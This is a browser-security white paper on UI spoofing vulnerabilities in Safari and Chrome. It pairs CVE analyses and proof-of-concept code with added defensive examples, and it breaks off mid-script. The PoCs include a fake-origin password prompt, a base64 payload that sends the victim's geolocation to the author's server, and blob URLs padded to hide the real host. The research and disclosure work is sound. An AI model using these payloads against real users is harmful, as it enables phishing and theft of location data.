
Browser UI Security Technical White Paper

Tencent Xuanwu Lab, xisigr

2017/10/16

Table of Contents

1 UI Spoof Overview
1.1 Address Bar Spoofing
1.2 Dialog Spoofing
1.3 Status Bar Spoofing
2 UI Spoof: Real-World Cases in Detail
2.1 Address bar spoofing + bypass of multiple security mechanisms (CVE-2015-3755)
2.2 Dialog spoofing + forged source display (CVE-2015-7093)
2.3 Geolocation permission dialog spoofing (CVE-2016-1779)
2.4 Blob URL spoofing (CVE-2016-5189 and CVE-2016-7623)
2.5 Address bar spoofing triggered by a colon (:) (CVE-2016-1707)
2.6 Address bar spoofing triggered by right-click (CVE-2016-5222)
2.8 Spoofing caused by dialog window size (CVE-2016-7592)
2.9 Right-to-left (RTL) URL spoofing (CVE-2017-5072)
2.10 Internationalized domain name spoofing (CVE-2017-5060)
2.11 Address bar spoofing triggered by the search engine (CVE-2017-2517)
2.12 Browser status bar spoofing
3 The Future

Browser UI refers to the browser's user interface. After decades of browser development there is still no uniform standard for it. The user interface of most modern browsers includes: forward and back buttons, refresh and stop-loading buttons, the address bar, the status bar, the page display window, the view-source window, and tabs. There may also be other elements, such as a download manager, in-page search, notifications, system management options, incognito windows and so on. We can think of the Browser UI as a front-end tab manager or Web shell: users do not have to consider how the browser's underlying layers process data, because the results of all network activity are presented to the user through the Browser UI.

From a security point of view, the attack the browser UI is most prone to is user interface spoofing, i.e. UI Spoof. UI Spoof is usually used for phishing. Phishing is a social-engineering attack that tricks users in order to obtain their sensitive information, usually by using a fake website that visually convinces users it is legitimate and genuine; when the user then operates the browser, sensitive information is likely to be obtained by the attacker. So when the browser's UX team develops the UI, the design, policy and logic of the UI security model are just as important as convenience for the user while browsing. A secure UI helps users make the right security decisions quickly and accurately while online. Once the UI has a flaw, an attacker can forge certain key information in the browser UI and use it to phish users.

This white paper explains what UI Spoof vulnerabilities are and analyzes UI security vulnerabilities in multiple browsers in detail.

1 UI Spoof Overview

UI Spoof is user interface spoofing. It is often used for phishing: the attack works by visually tricking the user into insecure network behavior. In the browser, the address bar, status bar and dialog boxes are usually the places most vulnerable to UI Spoof. For users, UX is a purely subjective experience, so in browser UI security design the position, size, color and other features of every front-end UI module require careful planning and consideration, especially in mobile browsers with small screens, where every pixel of browser UI is precious. Imagine that a trusted pixel can be controlled by the attacker, producing arbitrary fake UI content, including fake versions of the browser's own UI modules: this is a very dangerous situation. In the browser UI there is a boundary called the "line of death" (footnote 1), shown in Figure 1. The URL address bar at the top of the browser, for example, is completely controlled by the browser, and it is the UI module users can fully trust. The line of death sits at the junction of the address bar and the page display area. If you trust the pixels above the line of death, you are safe; otherwise you are "dead".

Figure 1

1.1 Address Bar Spoofing

An address bar spoofing vulnerability forges the most basic security boundary of the Web: the origin. A Web origin consists of a protocol, a host and a port; two origins are the same only when all three are identical. In modern browser UIs the address bar deliberately de-emphasizes the protocol and port, on the assumption that ordinary users do not understand the concept of an origin. For example, for http://www.163.com:80 the Chrome address bar displays www.163.com; the front-end UI display does not affect how the underlying origin is parsed. So we can consider that simply forging the host (domain name or IP) is an address bar spoofing vulnerability.

Google has stated it clearly: "We recognize that the address bar is the only reliable security indicator in modern browsers." In other words, if the address bar is spoofed, all of the trust users place in the Web page content collapses.

Initially, URLs in the browser address bar supported only ASCII characters; Unicode support was introduced later so that any language in the world could be used. But the Unicode character set is very large: it brings together all the world's encodings, currently has more than ten million characters, and is still growing. When these unusual characters are rendered in the browser address bar, both their appearance and their display order can deceive the user.

Unicode contains many look-alike characters. Sometimes two different Unicode strings are hard to tell apart on a small, low-resolution screen. For example, the slash characters "∖" (U+2216) and "＼" (U+FF3C) have different functions but look very similar. As Table 1 shows, the English character a (U+0061) has many similar-looking characters (footnote 2).

1 https://textslashplain.com/2017/01/14/the-line-of-death/

Code point   Name
U+0061       LATIN SMALL LETTER A
U+0251       LATIN SMALL LETTER ALPHA
U+03B1       GREEK SMALL LETTER ALPHA
U+0430       CYRILLIC SMALL LETTER A
U+237A       APL FUNCTIONAL SYMBOL ALPHA
U+1D41A      MATHEMATICAL BOLD SMALL A
U+1D44E      MATHEMATICAL ITALIC SMALL A
U+1D482      MATHEMATICAL BOLD ITALIC SMALL A
U+1D4B6      MATHEMATICAL SCRIPT SMALL A
U+1D4EA      MATHEMATICAL BOLD SCRIPT SMALL A
U+1D51E      MATHEMATICAL FRAKTUR SMALL A
U+1D552      MATHEMATICAL DOUBLE-STRUCK SMALL A
U+1D586      MATHEMATICAL BOLD FRAKTUR SMALL A
U+1D5BA      MATHEMATICAL SANS-SERIF SMALL A
U+1D5EE      MATHEMATICAL SANS-SERIF BOLD SMALL A
U+1D622      MATHEMATICAL SANS-SERIF ITALIC SMALL A
U+1D656      MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL A
U+1D68A      MATHEMATICAL MONOSPACE SMALL A
U+1D6C2      MATHEMATICAL BOLD SMALL ALPHA
U+1D6FC      MATHEMATICAL ITALIC SMALL ALPHA
U+1D736      MATHEMATICAL BOLD ITALIC SMALL ALPHA
U+1D770      MATHEMATICAL SANS-SERIF BOLD SMALL ALPHA
U+1D7AA      MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL ALPHA
U+FF41       FULLWIDTH LATIN SMALL LETTER A

Table 1
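
The look-alikes in Table 1 fall into classes that can be checked mechanically. The following is an added example, not code from the white paper or from any browser: a simplified heuristic that flags hostname labels which should not be shown as Unicode in an address bar. The function names (scriptsOf, labelRisks, hostnameReport, safeToShowAsUnicode) and the sample hostnames are constructed for illustration.

```javascript
// Added example: a simplified heuristic, not any browser's real IDN display policy.
// It classifies the look-alike classes from Table 1 for one hostname label.

const SCRIPTS = {
  Latin: /\p{Script=Latin}/u,
  Greek: /\p{Script=Greek}/u,
  Cyrillic: /\p{Script=Cyrillic}/u,
};

// Returns the set of scripts (from SCRIPTS) used by the characters of a label.
function scriptsOf(label) {
  const found = new Set();
  for (const ch of label) {
    for (const [name, re] of Object.entries(SCRIPTS)) {
      if (re.test(ch)) found.add(name);
    }
  }
  return found;
}

// Returns the reasons why a single label should not be rendered as Unicode.
function labelRisks(label) {
  const risks = [];
  // Fullwidth and mathematical letters (U+FF41, U+1D41A, ...) fold to plain
  // ASCII under NFKC, so a label that changes under NFKC is a disguise.
  if (label.normalize('NFKC') !== label) risks.push('compatibility-form');
  // Symbols such as U+237A (APL FUNCTIONAL SYMBOL ALPHA) are not letters at all.
  if (/\p{S}/u.test(label)) risks.push('symbol');
  // Latin mixed with Greek or Cyrillic, e.g. U+0430 inside an ASCII word.
  if (scriptsOf(label).size > 1) risks.push('mixed-script');
  // Limitation: a same-script look-alike such as U+0251 (Latin alpha) passes
  // all three checks; catching it needs the Unicode confusables data.
  return risks;
}

// Per-label report with code points, for logging or a warning UI.
function hostnameReport(hostname) {
  return hostname.split('.').map((label) => ({
    label,
    codePoints: [...label].map(
      (c) => 'U+' + c.codePointAt(0).toString(16).toUpperCase().padStart(4, '0')
    ),
    risks: labelRisks(label),
  }));
}

// True only if no label of the hostname raised a risk.
function safeToShowAsUnicode(hostname) {
  return hostnameReport(hostname).every((r) => r.risks.length === 0);
}
```

A hostname that fails this check is a candidate for display in its Punycode (xn--) form instead of Unicode.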

Besides encoding issues, the address bar has to display two things that compete with each other: "where you are" (the current URL) and "where you are going" (the URL about to be navigated to). When a logic error allows the two to be swapped, spoofing results. For example: t = window.open('http://www.google.com'); t.document.write('spoofing'); t.stop(). In some early browsers, this code could cause address bar spoofing.

On mobile browsers, displaying the address bar UI can be called a battle for every pixel, because mobile screens are so small. Long URLs can cause display problems in the address bar. No matter how little visual space the address bar has, we must follow the principle of displaying the true origin (footnote 3).

2 https://unicode.org/cldr/utility/confusables.jsp?a=a&r=None

For example, an attacker publishes the malicious URL https://login.your-bank.com.evil.com/login.your-bank.com

Figure 2

The last two address bar display strategies shown in Figure 2 are wrong. The first shows only the far left of the URL, so only part of the multi-level domain name is displayed; the second shows only the far right of the URL, which is the pathname portion. Neither display mode shows the real origin, evil.com, and the user will believe the site currently being visited is login.your-bank.com.
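
The two wrong strategies and an origin-preserving one, applied to the URL above. This is an added example, not code from the white paper or from any browser; the function names are made up for illustration, and registrableDomain() assumes the registrable domain is the last two labels, whereas a real implementation consults the Public Suffix List.

```javascript
// Added example: eliding a long URL for a narrow address bar.

// Assumption for illustration: registrable domain = last two labels.
// Real browsers derive it from the Public Suffix List.
function registrableDomain(hostname) {
  return hostname.split('.').slice(-2).join('.');
}

// Wrong strategy 1: keep the leftmost characters (scheme already hidden).
function showLeft(url, width) {
  return url.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '').slice(0, width);
}

// Wrong strategy 2: keep the rightmost characters of the whole URL.
function showRight(url, width) {
  return url.slice(-width);
}

// Origin-preserving strategy: never show the path, never cut into the
// registrable domain, and spend leftover width on the nearest subdomains.
function showOrigin(url, width) {
  const { hostname } = new URL(url);
  if (hostname.length <= width) return hostname;
  const core = registrableDomain(hostname);
  if (core === hostname) return core;            // nothing that is safe to drop
  const room = Math.max(0, width - core.length - 1); // 1 char for the ellipsis
  const prefix = hostname.slice(0, hostname.length - core.length);
  return '\u2026' + prefix.slice(prefix.length - room) + core;
}

// Side-by-side view of the three strategies for one URL and width.
function compareStrategies(url, width) {
  return {
    left: showLeft(url, width),
    right: showRight(url, width),
    origin: showOrigin(url, width),
  };
}
```

With a width of 19 characters, both wrong strategies render exactly login.your-bank.com, while the origin-preserving one ends in evil.com.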

In modern browsers, besides the most basic functions of displaying the current page URL and accepting URLs the user types to navigate, the address bar has taken on many new functions and responsibilities. For example, most browsers have merged the address bar and the search bar into one, commonly known as the smart address bar. With this design, confusion between URL logic and search logic may lead to address bar spoofing.

1.2 Dialog Spoofing

The alert dialog (alert()), the confirmation dialog (confirm()) and the prompt dialog (prompt()) are the three most commonly used dialog boxes in browsers. They are used to warn users or to prompt them to enter information. In addition, some other browser features trigger dialogs of their own, such as the geolocation (Geolocation API) permission dialog and the notification (Notification API) dialog. Most dialog spoofing is triggered either by popping the dialog up over a non-initiating window or by forging the displayed source. In addition, if arbitrary content can be inserted into the dialog, the success rate of the deception increases significantly.

3 https://www.chromium.org/Home/chromium-security/enamel

Pop-up over a non-initiating window

Here is a simple example: visiting the site www.xisigr.com pops up an alert dialog. This dialog is produced by the xisigr.com domain, so xisigr.com is the initiating window. If we can make this dialog pop up over the google.com domain, the dialog is cross-domain, and google.com is a non-initiating window.

Forged source display

Regarding the source shown by a dialog: a dialog popped up from www.xisigr.com usually displays source information, normally www.xisigr.com. If the source can be changed so that it appears as www.google.com, the source display is forged. This is also a bypass of the same-origin policy.

For dialogs that do not show source information, if text, even line breaks (\r\n), can be injected into the dialog, an attacker can inject a string such as www.google.com and adjust where it is displayed so that it looks like the dialog's source information, thereby achieving the deception.

1.3 Status Bar Spoofing

In modern browsers, the status bar usually does not appear in the main window by default. Only when a page is loading or a link address is being displayed does the status bar emerge in the lower-left corner of the browser window. Status bar spoofing takes the following forms:

(1) When the mouse moves over a link, the status bar displays address A; when the link is clicked, the browser goes to address B. This is easily achieved with a script. For example:

<a onclick="location='//B.com';return false;" href="//A.com">A.com</a>

Of course, this is not a vulnerability, just a small trick, and browsers have long supported this kind of handling.

(2) Using CSS to draw a native-looking status bar. CSS3 added support for rounded corners and shadows, which lets us use CSS to draw a status bar that looks exactly like the browser's own, which in turn can deceive the user.

From a security perspective, the potential risk of this is not so obvious. But the author still wants to raise the topic for discussion: when the browser's native UI can be fully simulated by user scripts, fraud may occur.

2 UI Spoof: Real-World Cases in Detail

2.1 Address bar spoofing + bypass of multiple security mechanisms (CVE-2015-3755)

CVE-2015-3755 is a vulnerability found by the author that bypasses multiple WebKit security mechanisms. It is caused by a logic error in how WebKit parses the port number of a URL. By exploiting it, an attacker can carry out a URL address bar spoofing attack, bypass the same-origin policy for the source displayed in dialogs, and bypass the address bar's HTTPS security lock protection.

Affected Products: Apple Safari <8.0.8, Apple Safari <7.1.8, Apple Safari <6.2.8, iOS <8.4.1

Vulnerability Announcement:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3755

So how does this vulnerability arise? Let's look directly at the PoC for CVE-2015-3755.

<a href="https://www.gmail.com:443." target="aa"
   onclick="setTimeout('fake()', 100)"><h1>click me</h1></a>
<script>
function fake() {
  var t = window.open('javascript:alert(1)', 'aa');
  t.document.body.innerHTML = '<title>Gmail</title><H1>Fake Page!!! - hack by xisigr</H1>';
}
</script>

Save the above code as test.html, for example http://www.xisigr.com/test.html, then run it in an affected version. Figure 3 shows the result of the author's run in Safari on iOS: URL spoofing + bypass of the dialog source display + bypass of the HTTPS security lock mechanism.

Figure 3

We know the valid range of a network port number: the port is either empty or a 16-bit unsigned integer. When a browser parses a URL and finds an error in the port number, for example a non-numeric port, it typically navigates to a predefined system error page. The URL accessed by our PoC is:

https://www.gmail.com:443.

This is a URL with an abnormal port number. Safari had a logic error when handling this exception: in the end the address bar stays at www.gmail.com, and we can manipulate the page's DOM as follows:

var t = window.open('javascript:alert(1)', 'aa');
t.document.body.innerHTML = '<title>Gmail</title><H1>Fake Page!!! - hack by xisigr</H1>';

When alert(1) pops up, the dialog displays the source https://www.gmail.com. Here the dialog's source display bypasses the same-origin policy, because the current domain is actually still xisigr.com. If the code is changed to alert(document.domain), this is clear at a glance, as shown in Figure 4.

Figure 4

At the same time, Safari's mechanism for deciding when to show the security lock is also bypassed. We know that when an https site is visited, the browser displays a security lock icon in the address bar. This quickly tells the user that traffic to the site being visited is encrypted and secure. But what we visit here is an erroneous, unencrypted URL, and Safari still shows the security lock icon.
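
The port rule stated above (empty, or a 16-bit unsigned integer) and its consequence for the UI can be written as a strict check. This is an added example, not WebKit or Safari code; parsePort, parseAuthority and addressBarState are hypothetical names, and the model assumes that a URL which fails to parse is never committed, so it contributes neither a host nor a lock icon to the address bar.

```javascript
// Added example: strict port handling for scheme://[userinfo@]host[:port].
const DEFAULT_PORTS = { 'http:': 80, 'https:': 443 };

// A port is either empty or an integer in the range 0..65535.
function parsePort(text) {
  if (text === '') return { ok: true, port: null };
  if (!/^[0-9]+$/.test(text)) return { ok: false, reason: 'non-numeric port' };
  const value = Number(text);
  if (value > 65535) return { ok: false, reason: 'port out of range' };
  return { ok: true, port: value };
}

// Splits the authority without guessing: anything unexpected is a failure.
function parseAuthority(url) {
  const m = /^([a-z][a-z0-9+.-]*:)\/\/([^\/?#]*)/i.exec(url);
  if (!m) return { ok: false, reason: 'no authority' };
  const scheme = m[1].toLowerCase();
  const hostPort = m[2].slice(m[2].lastIndexOf('@') + 1); // drop userinfo
  let searchFrom = 0;
  if (hostPort.startsWith('[')) {                         // IPv6 literal
    searchFrom = hostPort.indexOf(']');
    if (searchFrom === -1) return { ok: false, reason: 'unterminated IPv6 literal' };
  }
  const colon = hostPort.indexOf(':', searchFrom);
  const host = colon === -1 ? hostPort : hostPort.slice(0, colon);
  const portText = colon === -1 ? '' : hostPort.slice(colon + 1);
  if (host === '') return { ok: false, reason: 'empty host' };
  const port = parsePort(portText);
  if (!port.ok) return { ok: false, reason: port.reason };
  return { ok: true, scheme, host: host.toLowerCase(), port: port.port };
}

// Hypothetical UI model: what the address bar may show for a requested URL.
// lockEligible only says the scheme allows a lock; a real browser also
// requires a successfully validated TLS connection before showing one.
function addressBarState(url) {
  const a = parseAuthority(url);
  if (!a.ok) {
    // Invalid URL: show the error page, keep the host and the lock out of the UI.
    return { commit: false, text: null, lockEligible: false, reason: a.reason };
  }
  const showPort = a.port !== null && a.port !== DEFAULT_PORTS[a.scheme];
  return {
    commit: true,
    text: a.host + (showPort ? ':' + a.port : ''),
    lockEligible: a.scheme === 'https:',
    reason: null,
  };
}
```

For https://www.gmail.com:443. this model returns commit: false with the reason non-numeric port, so neither www.gmail.com nor a lock icon would be displayed.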

2.2 Dialog spoofing + forged source display (CVE-2015-7093)

After fixing CVE-2015-3755, Safari on iOS removed the source display from dialogs. For example, run this code:

<button onclick=alert(1)>Click me</button>

Clicking "Click me" pops up an alert(1) dialog whose UI displays only "1", with no source shown. Chrome and Firefox dialogs do display the source, as shown in Figure 5:

Figure 5

Displaying the source in a dialog conforms to normal security logic. I do not know why Safari treated dialogs this way after fixing CVE-2015-3755. Not displaying the source increases the risk of spoofing; this point is explained in detail in the vulnerability analysis below.

CVE-2015-7093 is a vulnerability the author discovered under these circumstances. The cause is that in Safari a dialog can pop up over a non-initiating window, and content can be injected into the dialog UI to display a forged source. An attacker who exploits this vulnerability can launch phishing attacks against users.

Affected Products: Apple Safari, Apple iOS <9.2

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7093

PoC for CVE-2015-7093:

Save the following code as http://test.com/1.html:

<html>
<a href=2.html target='_blank'>click me</a>
</html>

Save the following code as http://test.com/2.html:

<html>
<body>
<script>
location = 'https://www.google.com';
function go() {
  if (window.opener) {
    window.opener.location = 'data:text/html,<title>test</title><script>' +
      'pass=prompt("https://google.com\nType your password:\n");' +
      'alert("Your Password is: " + pass);' +
      '<\/script>';
  }
}
go();
</script>
</body>
</html>

Run http://test.com/1.html in Safari and click the "click me" link. Whatever the user then enters in the dialog is likely to be stolen. The result is shown in Figure 6, where the user entered 123 in the dialog:

Figure 6

Let's take the PoC code apart step by step to analyze how this spoofing attack is achieved. First, note that there are 2 page windows: window A is www.test.com/1.html and window B is www.test.com/2.html. Window A is the parent window of window B.

The code in window B mainly does 2 things.

(1) When window B is opened, it navigates to https://www.google.com.

Code: location = 'https://www.google.com';

(2) It makes the parent window A pop up a dialog.

Code:

window.opener.location = 'data:text/html,<title>test</title><script>pass=prompt("https://google.com\nType your password:\n");alert("Your Password is: "+pass);</script>';

While window B is navigating to https://www.google.com, the dialog from window A is displayed over window B. The dialog blocks window B's navigation to https://www.google.com, which stays in a waiting state. This produces the spoofing result shown in the previous figure. The attacker also inserts more deceptive content into the dialog to forge the source display.

2.3 Geolocation permission dialog spoofing (CVE-2016-1779)

Besides the browser's alert()/prompt()/confirm() dialogs, some Web APIs generate dialogs of their own, such as the geolocation (Geolocation API) permission dialog and the notification (Notification API) dialog. These dialogs derived from Web APIs also carry a risk of spoofing.

CVE-2016-1779 is a vulnerability in the geolocation permission dialog. The Geolocation API is used to obtain the location of the user's host device, and it has a comprehensive mechanism for protecting user privacy (footnote 4). Geolocation can only be used after the user grants permission, unless a trust relationship has been confirmed previously. When the Geolocation API is used, the browser pops up a permission dialog to notify the user, and the dialog UI must contain the URL of the current page. CVE-2016-1779 may allow a remote attacker to bypass the same-origin policy and make the permission dialog pop up over any domain, and to obtain the user's geographic location when the user clicks Allow.

Affected Products: Apple iOS <9.3, Apple Safari <9.1

4 https://www.w3.org/TR/geolocation-API/#security

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1779

Triggering the Geolocation permission dialog is very simple: just run the following code, provided the current domain has not previously been allowed to obtain Geolocation.

<script>
function success(position) {}
navigator.geolocation.getCurrentPosition(success);
</script>

For example, at http://www.test.com/geo.html: after it runs, the browser pops up a permission dialog on the current page, and the dialog UI displays the source: www.test.com.

Looking at how this permission dialog is triggered, the author had the following thoughts.

1. Can the source of the permission request be changed?

2. If it can be changed, can it be made empty?

Following this idea, I continued testing. In the process, I found that when Safari and Chrome on iOS parse this code from a data: URL, the source shown in the permission dialog is "://". See Figure 7.

data: text / html; base64, PHNjcmlwdD4KZnVuY3Rpb24gc3VjY2Vzcyhwb3NpdGlvbikge30

KbmF2aWdhdG9yLmdlb2xvY2F0aW9uLmdldEN1cnJlbnRQb3NpdGlvbihzdWNjZXNzKTsKPC9zY3J

pcHQ + Cg ==

Figure 7

Next, the author optimized the PoC further.

<title>test</title>
<script>
function geo() {
  window.open('http://www.google.com');
  location =

'Data: text / html; base64, PCFET0NUWVBFIGh0bWw + CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ

+ CjxtZXRhIGNoYXJzZXQ9dXRmLTggLz4KPHRpdGxlPmdlb2xvY2F0aW9uPC90aXRsZT4KPGJvZHk

+ CjxzY3JpcHQ

+ CmZ1bmN0aW9uIHN1Y2Nlc3MocG9zaXRpb24pIHsKZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3J

lbW90ZScpLnNyYz0iaHR0cDovL3hpc2lnci5jb20vdGVzdC9nZW8v

Z2V0LnBocD9nZW9sb2NhdGlvbj0iKyItLS0tLS0iK2VuY29kZVVSSUNvbXBvbmVudChwb3NpdGlv

bi5jb29yZHMubGF0aXR1ZGUpKyIsIitlbmNvZGVVUklDb21wb25lb

nQocG9zaXRpb24uY29vcmRzLmxvbmdpdHVkZSk7CiB9Cm5hdmlnYXRvci5nZW9sb2NhdGlvbi5nZ

XRDdXJyZW50UG9zaXRpb24oc3VjY2Vzcyk7Cjwvc2NyaXB0Pgo8aW

1nIGlkPSJyZW1vdGUiIHNyYz0iIiB3aWR0aD0wIGhlaWdodD0wPgo8L2JvZHk + CjwvaHRtbD4 = ';

}
</script>
<button onclick='geo()'>Click Me</button>

The decoded Base64 code is as follows:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset=utf-8 />
<title>geolocation</title>
<body>
<script>
function success(position) {
  document.getElementById('remote').src = "http://xisigr.com/test/geo/get.php?geolocation=" + "------" + encodeURIComponent(position.coords.latitude) + "," + encodeURIComponent(position.coords.longitude);
}
navigator.geolocation.getCurrentPosition(success);
</script>
<img id="remote" src="" width=0 height=0>
</body>
</html>

The result of running the above code is shown in Figure 8.

Figure 8

Remember what we said earlier: "the source displayed in the permission dialog must be the same as the source of the current page." At this point we have successfully bypassed the same-origin policy: the Geolocation permission dialog for the data: domain pops up over a non-initiating window, forming a permission dialog spoofing attack. When the user clicks Allow, the system does not check whether the source shown in the permission UI is the same as the source of the current page, so the location is sent to the attacker's server.

Here is a little story about CVE-2016-1779 to share. Shortly after the author submitted this vulnerability to Apple, on 2016/1/6, I received some location information fed back to my server. The submitted PoC had already made clear that it used a vulnerability verification environment built on the author's own server, and that if it was triggered, the data would be sent to the author's server. See Figure 9.

Figure 9

On inspection, 37.332578830316436, -122.03068509201906 turned out to be the address of Apple's official headquarters in the US. See Figure 10.

Figure 10

The returned data shows that Apple's researchers triggered the PoC at 7 points in time, 2016/1/6, 2016/1/7, 2016/1/8, 2016/1/10, 2016/1/20, 2016/1/22 and 2016/1/28, always from the same address, Apple's headquarters in the United States. It is possible that when verifying the vulnerability, Apple's researchers did not build their own verification environment but directly used the original PoC environment provided by the author, so that each verification sent a location back to the author's server.

Apple's security staff should have been aware of this, because the PoC states clearly that data will be sent back to the address xisigr.com/test/geo/info.txt. Yet they triggered the vulnerability 7 times in a row. Whether this was negligence, or they simply did not care that the location of Apple's headquarters leaked (this address can, after all, be found anywhere on the Internet), the author was still very surprised: the geographic location of Apple's testers and their work schedule were obtained just like that.

Of course this is not just a story. It is a reminder that in a real, sophisticated cyber attack, a scrap of information can sometimes be the point of breakthrough: "a dike a thousand miles long can be destroyed by an ant colony". Do not let private information as important as geographic location be obtained by an attacker so easily.

2.4 Blob URL spoofing (CVE-2016-5189 and CVE-2016-7623)

Compared with common network URL schemes such as "http", "https" and "ftp", local URL schemes are also subject to spoofing attacks, and these are more likely to be overlooked by programmers and users. Local URL schemes include "data", "about", "blob", "filesystem" and "file". CVE-2016-5189 is a URL spoofing vulnerability involving "blob URLs". It exists in the Chrome browser.

Affected Products: Google Chrome <54.0.2840.59 for Windows, Mac, Linux. 54.0.2840.85 for Android

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5189

What are blob URLs

A blob (binary large object) is a container that can store binary data. The "blob URLs" scheme allows Web applications to access binary data securely, that is, through a reference to a blob held in memory. A "blob URL" consists of the origin of the host and a path represented by a UUID: blob = scheme ":" origin "/" UUID. The scheme is always blob, origin is the origin that generated the blob URL, and UUID is a reference as defined in [RFC4122]. A blob URL usually looks like this:

blob:https://example.org/ea3527a8-134f-46ae-be03-421f067d97f0

Generating a blob URL

URL.createObjectURL() is a static method that creates a DOMString containing a URL that represents the object passed as its parameter. The lifetime of this URL is tied to the document of the window that created it. The new URL object represents the specified File object or Blob object.

Each call to createObjectURL() creates a new URL object, even if one has already been created with the same object as the parameter. When a URL object is no longer needed, it must be released by calling URL.revokeObjectURL(). The browser releases them automatically when the document is unloaded, but for the best performance and memory usage you should release them explicitly when it is safe to do so.

Visit http://example.com/blob.html in the browser. The code is as follows:

<script>
function aa() {
  args = ['123456'];
  b = new Blob(args, {type: 'text/html'});
  window.open(URL.createObjectURL(b));
}
</script>
<button onclick='aa()'>click me</button>

In Chrome, Safari and Firefox on PC, clicking the "click me" button pops up a page of the blob URL type whose content is 123456.

In the Edge browser, this code cannot be executed. Moreover, blob URLs in Edge look like this, with no origin part: blob:246AC85B-5A42-425B-A059-F8A41BC13122.

Blob URL spoofing

The PoC code for CVE-2016-5189 is as follows:

<script>
function pwned() {
  var t = window.open('', 'ss');
  t.document.write("<h1>phishing page</h1><title>google</title>");
  t.stop();
}
</script>
<a href="blob:http://www.google.com%EF%BE%A0............@xisigr.com" target="ss"
   onclick="setTimeout('pwned()', '500')">click me1</a><br>
<br>
<a href="blob:http://www.google.com ............@xisigr.com" target="ss"
   onclick="setTimeout('pwned()', '500')">click me2</a><br>

Click the "click me" link; the result is shown in Figure 11.

Figure 11

Looking at the PoC code, it is not hard to see that the key is the URL "www.google.com...@xisigr.com". It uses the @ symbol to place the string www.google.com in front of the real domain name, and adds a large number of whitespace characters after www.google.com. The real domain name is thus pushed out of sight in the browser, where the address bar cannot show it. Users mistakenly believe this is a "blob URL" of the google.com domain, resulting in a spoofing attack.

CVE-2016-7623 is likewise a "blob URLs" spoofing vulnerability. Its cause is similar to CVE-2016-5189; the only difference is that the whitespace used is %EF%B9%BA (U+FE7A), so it is not described further here. See Figure 12.

Affected Products: iOS <10.2, Safari <10.0.2

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7623

Figure 12

CVE-2016-7623 PoC:

<script>
function go() {
  var t = window.open('', 'aaaa');
  t.document.write("<h1>phising</h1><title>Google</title>");
}
function ipad() {
  var t = window.open('blob:http://www.google.com' + Array(0x50).join("%EF%B9%BA") + '@xisigr.com', 'aaaa');
  setTimeout('go()', '500');
}
function iphone() {
  var t = window.open('blob:http://www.google.com' + Array(0x20).join("%EF%B9%BA") + '@xisigr.com', 'aaaa');
  setTimeout('go()', '500');
}
function blob() {
  var blob = new Blob([], {type: "text/html;charset=utf-8"});
  var url = URL.createObjectURL(blob);
  var t = window.open(url, 'aaaa');
  if (navigator.userAgent.indexOf("iPhone") > -1) {
    setTimeout('iphone()', '500');
  }
  if (navigator.userAgent.indexOf("iPad") > -1) {
    setTimeout('ipad()', '500');
  }
}
</script>
<button onclick="blob()">Click me</button>

Both CVE-2016-5189 and CVE-2016-7623 are flaws in which the username and password portion of a blob URL is rendered, which is extremely dangerous. The username and password of a URL should not be rendered, because they can be mistaken for the URL's host. For example: https://examplecorp.com@attacker.example/.
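
The rule above (never render the username and password) can be enforced at the point where a URL is turned into display text. This is an added example, not Chrome or Safari code; innerUrlOf and analyseUserinfo are hypothetical names, and the padded sample URL in the usage is constructed with .example hosts.

```javascript
// Added example: derive what may be displayed for a URL that carries userinfo.

// blob:<origin>/<uuid> wraps an ordinary URL; unwrap it before parsing.
function innerUrlOf(raw) {
  const text = raw.toLowerCase().startsWith('blob:') ? raw.slice(5) : raw;
  return new URL(text); // throws on an unparsable URL
}

// Reports the real host, a display string without userinfo, and findings
// that explain why the raw string would mislead a reader.
function analyseUserinfo(raw) {
  const url = innerUrlOf(raw);
  const userinfo = url.password ? url.username + ':' + url.password : url.username;
  let decoded = userinfo;
  try {
    decoded = decodeURIComponent(userinfo);
  } catch {
    // Malformed percent-encoding: keep the raw form for the checks below.
  }
  const findings = [];
  if (userinfo !== '') findings.push('userinfo-present');
  // Userinfo that starts like a domain name is there to be read as the host.
  if (/^[a-z0-9-]+(\.[a-z0-9-]+)+/i.test(decoded)) findings.push('userinfo-looks-like-host');
  // Spaces and non-ASCII fillers (the PoCs use %EF%BE%A0 = U+FFA0 and
  // %EF%B9%BA = U+FE7A) push the real host out of the visible area.
  const paddingChars = [...decoded].filter(
    (c) => c === ' ' || c.codePointAt(0) > 0x7e
  ).length;
  if (paddingChars > 0) findings.push('padding-in-userinfo');
  return {
    realHost: url.host,
    display: url.protocol + '//' + url.host, // userinfo is never rendered
    paddingChars,
    findings,
  };
}

// Usage with a constructed sample: 40 fillers between the fake and real host.
const paddedSample =
  'blob:http://www.bank.example' + '%EF%BE%A0'.repeat(40) + '@attacker.example';
const paddedReport = analyseUserinfo(paddedSample);
```

For the constructed sample, paddedReport.display is http://attacker.example and all three findings are raised.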

2.5 Address bar spoofing triggered by a colon (:) (CVE-2016-1707)

CVE-2016-1707 is an address bar spoofing vulnerability in Chrome for iOS that the author reported to Google in June 2016. It received a vulnerability reward of $3000 from Google. The effect of the attack is shown in Figure 13.

Affected Products: Chrome <v52.0.2743.82 , iOS <v10

Vulnerability Announcement: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1707

Figure 13

<script>

payload = "PGJvZHk + PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50

LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206

Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNr

KCk7DQo8L3NjcmlwdD4 = ";

function pwned() {
  var t = window.open('https://www.gmail.com/', 'aaaa');
  t.document.write(atob(payload));
